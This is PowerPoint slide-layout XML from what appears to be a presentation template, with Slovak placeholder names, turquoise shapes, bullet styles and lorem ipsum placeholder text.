            <a:ext cx="16535400" cy="514350"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l"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  <a:br>
              <a:rPr lang="en-US"/>
            </a:br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D9EDF35-5E2D-F730-672F-A0304BDF47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76300" y="2009776"/>
            <a:ext cx="5374958" cy="6991350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0FC6BA4-F2FE-10F8-1E56-608C50CFCABA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456520" y="2009776"/>
            <a:ext cx="5374958" cy="6991350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6AF3544-FEF4-D0DE-603E-CBB69039779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036740" y="2009776"/>
            <a:ext cx="5374958" cy="6991350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B7B62AA-2FA7-BF6A-48B8-CCCF96A95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045" y="9405756"/>
            <a:ext cx="2279055" cy="39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77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AF9B2761-4C48-23D8-0538-F012E2CAD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0" y="2322847"/>
            <a:ext cx="8267700" cy="1431256"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr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4000" y="4333953"/>
            <a:ext cx="8267700" cy="2131353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/>
            </a:lvl1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eros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2621ABF-86CE-8225-0608-1C5CA43FF4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543175" y="1557338"/>
            <a:ext cx="5133975" cy="72294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239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B73BEE8A-F8C8-D8F2-AD31-2CAD920079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10150" y="876300"/>
            <a:ext cx="82677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4937" y="3286203"/>
            <a:ext cx="7210425" cy="4352847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4000" b="1"/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  <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Zástupný objekt pre text 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{085B017A-7671-6A44-E654-19140D0A1E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72640" y="3286202"/>
            <a:ext cx="7210425" cy="4352847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4000" b="1"/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645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B73BEE8A-F8C8-D8F2-AD31-2CAD920079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10150" y="876300"/>
            <a:ext cx="82677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4937" y="3286203"/>
            <a:ext cx="7210425" cy="4352847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4000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr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adfereipiscing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>
                <a:solidFill>
                  <a:srgbClr val="424D56"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Donec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  <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Zástupný objekt pre text 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{085B017A-7671-6A44-E654-19140D0A1E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72640" y="3286202"/>
            <a:ext cx="7210425" cy="4352847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4000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr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25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B73BEE8A-F8C8-D8F2-AD31-2CAD920079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10150" y="876300"/>
            <a:ext cx="8267700" cy="580711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4937" y="4451812"/>
            <a:ext cx="7210425" cy="4352847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3000" b="1"/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 sz="3000"/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  <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Zástupný objekt pre text 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{085B017A-7671-6A44-E654-19140D0A1E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72640" y="4451811"/>
            <a:ext cx="7210425" cy="4352847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3000" b="1"/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 sz="3000"/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  <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Zástupný objekt pre text 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5724597B-F7B7-A46A-AFF4-BC99CDDED8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4936" y="2092125"/>
            <a:ext cx="15478127" cy="1977458"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="2400"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="3000"/>
            </a:lvl1pPr>
            <a:lvl2pPr marL="685800" indent="0">
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr sz="3000"/>
            </a:lvl2pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="424D56"/>
                </a:solidFill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727789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text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B73BEE8A-F8C8-D8F2-AD31-2CAD920079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10150" y="876300"/>
            <a:ext cx="8267700" cy="580711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4937" y="4451812"/>
            <a:ext cx="7210425" cy="4352847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3000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr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 sz="3000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr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  <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Zástupný objekt pre text 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{085B017A-7671-6A44-E654-19140D0A1E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72640" y="4451811"/>
            <a:ext cx="7210425" cy="4352847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3000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr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 sz="3000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr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r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="424D56"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Donec </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:solidFill>
                  <a:srgbClr val="424D56"/>
                </a:solidFill>
              </a:rPr>
              <a:t>aliquetfe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  <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Zástupný objekt pre text 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5724597B-F7B7-A46A-AFF4-BC99CDDED8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4936" y="2092125"/>
            <a:ext cx="15478127" cy="1977458"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="2400"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="3000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="685800" indent="0">
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr sz="3000"/>
            </a:lvl2pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="424D56"/>
                </a:solidFill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97237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1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B73BEE8A-F8C8-D8F2-AD31-2CAD920079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41847" y="876300"/>
            <a:ext cx="11004308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1846" y="3183856"/>
            <a:ext cx="11004309" cy="5266945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4000" b="1"/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643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1col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B73BEE8A-F8C8-D8F2-AD31-2CAD920079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41847" y="876300"/>
            <a:ext cx="11004308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1846" y="3183856"/>
            <a:ext cx="11004309" cy="5266945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4000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr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</a:lstStyle>
          <a:p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55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1col lon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B73BEE8A-F8C8-D8F2-AD31-2CAD920079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41847" y="876300"/>
            <a:ext cx="11004308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20633" y="2920508"/>
            <a:ext cx="14646735" cy="5793640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3000" b="1"/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 sz="3000"/>
            </a:lvl2pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="457200" marR="0" lvl="0" indent="-457200" algn="l" defTabSz="13716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tabLst/>
              <a:defRPr/>
            </a:pPr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pPr marL="457200" marR="0" lvl="0" indent="-457200" algn="l" defTabSz="13716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/>
            </a:pPr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r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="424D56"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 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Donec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/>
            </a:pPr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r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="424D56"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 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/>
            </a:pPr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r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="424D56"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 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endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="42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473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3288145"/>
            <a:ext cx="12976178" cy="2974109"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/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Chapter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79A8F13-6F19-C8B3-D145-4A50E2985D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72000" y="8784000"/>
            <a:ext cx="4147826" cy="720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97161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1col longer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B73BEE8A-F8C8-D8F2-AD31-2CAD920079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41847" y="876300"/>
            <a:ext cx="11004308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AEF9D1C4-20D8-6E7E-2F05-87641BDDF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20633" y="2920508"/>
            <a:ext cx="14646735" cy="5793640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440"/>
          <a:lstStyle>
            <a:lvl1pPr marL="457200" indent="-457200">
              <a:spcBef>
                <a:spcPts val="24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defRPr sz="3000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="1028700" indent="-342900">
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
              <a:defRPr sz="3000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="457200" marR="0" lvl="0" indent="-457200" algn="l" defTabSz="13716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</a:buBlip>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="424D56"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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 err="1">
                <a:solidFill>
                  <a:srgbClr val="424D56"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Consectetur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adipiscing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elit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pPr marL="457200" marR="0" lvl="0" indent="-457200" algn="l" defTabSz="13716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/>
            </a:pPr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r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="424D56"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 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  <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="424D56"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Lorem ipsum</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="424D56"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Donec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/>
            </a:pPr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r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="424D56"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 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pretium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justo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condimentum</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="424D56"/>
              </a:solidFill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</a:buBlip>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="424D56"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Maecenas </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:solidFill>
                  <a:srgbClr val="424D56"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="424D56"/>
                </a:solidFill>
              </a:rPr>
              <a:t> eros </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:solidFill>
                  <a:srgbClr val="424D56"/>
                </a:solidFill>
              </a:rPr>
              <a:t>erat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="424D56"/>
                </a:solidFill>
              </a:rPr>
              <a:t> lorem ipsum dolor sit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:solidFill>
                  <a:srgbClr val="424D56"/>
                </a:solidFill>
              </a:rPr>
              <a:t>amet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donec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aliquet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="424D56"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:solidFill>
                  <a:srgbClr val="424D56"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sapien</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="42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2118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 - turq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37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{75E49ECB-3EBE-02ED-EAC6-8C937FD2923B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1" y="0"/>
            <a:ext cx="7596553" cy="6730342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00BBC5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4427872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One liner</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1829704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monitor, display, electronics&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8EEF7425-51E0-6370-A3DE-D3698DE38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417AFF0-55AC-0FA2-51D1-B2E3A840C7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66925" y="933451"/>
            <a:ext cx="14173199" cy="800407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441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pho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417AFF0-55AC-0FA2-51D1-B2E3A840C7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17488" y="574158"/>
            <a:ext cx="4253024" cy="9154633"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 11490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7A65B8FF-5062-8165-A8BD-723954443B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6150" y="-514350"/>
            <a:ext cx="11315700" cy="1131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577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e Sta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7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{540BFBBE-4E79-238E-B01E-E15038D05942}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1" y="0"/>
            <a:ext cx="5516544" cy="4887510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00BBC5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A7C59AC1-B7D7-CCF7-59EA-ACAB8B8BEE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36899" b="45426"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9709598" y="4672484"/>
            <a:ext cx="8578398" cy="56145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876300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0D87EC6F-0D97-2B71-5625-7DD044F26FD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4346422"/>
            <a:ext cx="3533172" cy="18127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4EC1C45D-D7CF-E906-7EC2-5181A713B92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4346422"/>
            <a:ext cx="3533172" cy="18127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DB51807-A241-271D-DEC6-3DA50777FB4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4346422"/>
            <a:ext cx="3533172" cy="18127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F9CC0FA3-EAC6-C4D0-251E-98E309ADC25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6300" y="2528432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 anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="8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#1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4B93FCBC-5340-52BB-BAE2-020B9824D9E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10376" y="2528432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 anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="8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1Bn+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C5CA1994-2600-9721-3FE5-5597D44DB02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544452" y="2528432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 anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="8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400K+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B64DD8E8-711F-7128-397B-1140CA4EA10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878528" y="2528432"/>
            <a:ext cx="3533172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75000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="8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110M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AE5E1655-1C9E-EA2E-44EF-F771E50962C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76300" y="4346422"/>
            <a:ext cx="3533172" cy="18127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1EF98A0A-8454-8AC8-92FC-6295D77CCED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6300" y="6988470"/>
            <a:ext cx="16535400" cy="77009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Secondary headline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72C056ED-4A36-EF4A-16EB-528C14B028F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76300" y="7943850"/>
            <a:ext cx="3533172" cy="14668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41BF52C1-7ED9-8E4C-F000-095610720ED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5210376" y="7943850"/>
            <a:ext cx="3533172" cy="14668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00266EB9-BF63-5E41-6693-5A8564C8A07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544452" y="7943850"/>
            <a:ext cx="3533172" cy="14668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59D4150C-2ED5-FF23-AFCB-EECC5E896ADE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13878528" y="7943850"/>
            <a:ext cx="3533172" cy="14668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46A1E52-1B84-2D09-94CB-D32DE6D4D545}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="876300" y="6390752"/>
            <a:ext cx="165354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7758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r tech deck">
    <p:bg>
      <p:bgPr>
        <a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4427872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One liner</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3739840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E6CBC6A8-C4EC-E73E-CCBF-258E21523750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4419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0DE4229-D69F-B0DC-5EE5-1071970034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FB3CD3-4944-1C07-A2EC-98CD348E1FC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0" y="9410700"/>
            <a:ext cx="18288000" cy="876300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0096A1">
              <a:alpha val="90000"/>
            </a:srgbClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="274320" rIns="274320"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685800" indent="0">
              <a:buNone/>
              <a:defRPr sz="2000"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1371600" indent="0">
              <a:buNone/>
              <a:defRPr sz="2000"/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="2057400" indent="0">
              <a:buNone/>
              <a:defRPr sz="2000"/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2743200" indent="0">
              <a:buNone/>
              <a:defRPr sz="2000"/>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Image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2687303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urquois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0DE4229-D69F-B0DC-5EE5-1071970034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832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urquoise with Headli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0DE4229-D69F-B0DC-5EE5-1071970034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50D499-608D-0875-D2DA-752EF6E8E6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6300" y="4427872"/>
            <a:ext cx="16535400" cy="1431256"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:outerShdw blurRad="381000" dist="38100" dir="5400000" algn="t" rotWithShape="0">
              <a:srgbClr val="004B55"/>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"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One liner</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="393655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rotection De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3288145"/>
            <a:ext cx="12976178" cy="2974109"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/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Chapter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2A07996-8A44-7C26-2F3A-155AC49521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72000" y="8784000"/>
            <a:ext cx="4147826" cy="720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6300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urquoise with Headline an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0DE4229-D69F-B0DC-5EE5-1071970034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8000" cy="10287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23A459B-6BBF-3BD9-47BD-D8E22D78B4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6300" y="920729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39B6E6-4E07-97BE-D1C4-5998259F661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010409" y="2863516"/>
            <a:ext cx="10267183" cy="547692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1pPr>
            <a:lvl2pPr marL="6858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2pPr>
            <a:lvl3pPr marL="13716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3pPr>
            <a:lvl4pPr marL="20574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4pPr>
            <a:lvl5pPr marL="2743200" indent="0" algn="ctr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2549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objekt pre text 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1633441F-0A1E-03E0-2BCD-C54E25DD930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2961294"/>
            <a:ext cx="4364410" cy="4364410"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00BBC5">
              <a:alpha val="90000"/>
            </a:srgb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b="0" spc="-4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buNone/>
              <a:defRPr sz="3500" spc="-40" baseline="0"/>
            </a:lvl2pPr>
            <a:lvl3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3pPr>
            <a:lvl4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4pPr>
            <a:lvl5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5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to add a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sk-SK"/>
              <a:t> text</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Zástupný objekt pre text 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E6A64BC7-62C8-E4B7-96D6-79FF3756DF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33297" y="2961294"/>
            <a:ext cx="4364410" cy="4364410"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0096A1">
              <a:alpha val="90000"/>
            </a:srgb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b="0" spc="-4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buNone/>
              <a:defRPr sz="3500" spc="-40" baseline="0"/>
            </a:lvl2pPr>
            <a:lvl3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3pPr>
            <a:lvl4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4pPr>
            <a:lvl5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5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to add a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sk-SK"/>
              <a:t> text</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Zástupný objekt pre text 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C1A46C4E-CA37-AF35-D0B4-99E299FB11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90294" y="2961294"/>
            <a:ext cx="4364410" cy="4364410"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00717F">
              <a:alpha val="90000"/>
            </a:srgb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b="0" spc="-4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buNone/>
              <a:defRPr sz="3500" spc="-40" baseline="0"/>
            </a:lvl2pPr>
            <a:lvl3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3pPr>
            <a:lvl4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4pPr>
            <a:lvl5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5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to add a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sk-SK"/>
              <a:t> text</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Zástupný objekt pre text 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{88043803-0909-18DD-0BE9-61A3DFCD81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047290" y="2961294"/>
            <a:ext cx="4364410" cy="4364410"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="004B55">
              <a:alpha val="90000"/>
            </a:srgb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b="0" spc="-4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buNone/>
              <a:defRPr sz="3500" spc="-40" baseline="0"/>
            </a:lvl2pPr>
            <a:lvl3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3pPr>
            <a:lvl4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4pPr>
            <a:lvl5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5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to add a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sk-SK"/>
              <a:t> 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C174186-8D09-6BA8-890D-F71E699A9D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6300" y="920729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71236212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objekt pre text 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1633441F-0A1E-03E0-2BCD-C54E25DD930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2961294"/>
            <a:ext cx="4364410" cy="4364410"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00BBC5">
              <a:alpha val="90000"/>
            </a:srgb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b="0" spc="-4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buNone/>
              <a:defRPr sz="3500" spc="-40" baseline="0"/>
            </a:lvl2pPr>
            <a:lvl3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3pPr>
            <a:lvl4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4pPr>
            <a:lvl5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5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to add a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sk-SK"/>
              <a:t> text</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Zástupný objekt pre text 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E6A64BC7-62C8-E4B7-96D6-79FF3756DF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33297" y="2961294"/>
            <a:ext cx="4364410" cy="4364410"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0096A1">
              <a:alpha val="90000"/>
            </a:srgb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b="0" spc="-4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buNone/>
              <a:defRPr sz="3500" spc="-40" baseline="0"/>
            </a:lvl2pPr>
            <a:lvl3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3pPr>
            <a:lvl4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4pPr>
            <a:lvl5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5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to add a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sk-SK"/>
              <a:t> text</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Zástupný objekt pre text 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C1A46C4E-CA37-AF35-D0B4-99E299FB11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90294" y="2961294"/>
            <a:ext cx="4364410" cy="4364410"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00717F">
              <a:alpha val="90000"/>
            </a:srgb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b="0" spc="-4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buNone/>
              <a:defRPr sz="3500" spc="-40" baseline="0"/>
            </a:lvl2pPr>
            <a:lvl3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3pPr>
            <a:lvl4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4pPr>
            <a:lvl5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5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to add a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sk-SK"/>
              <a:t> text</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Zástupný objekt pre text 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
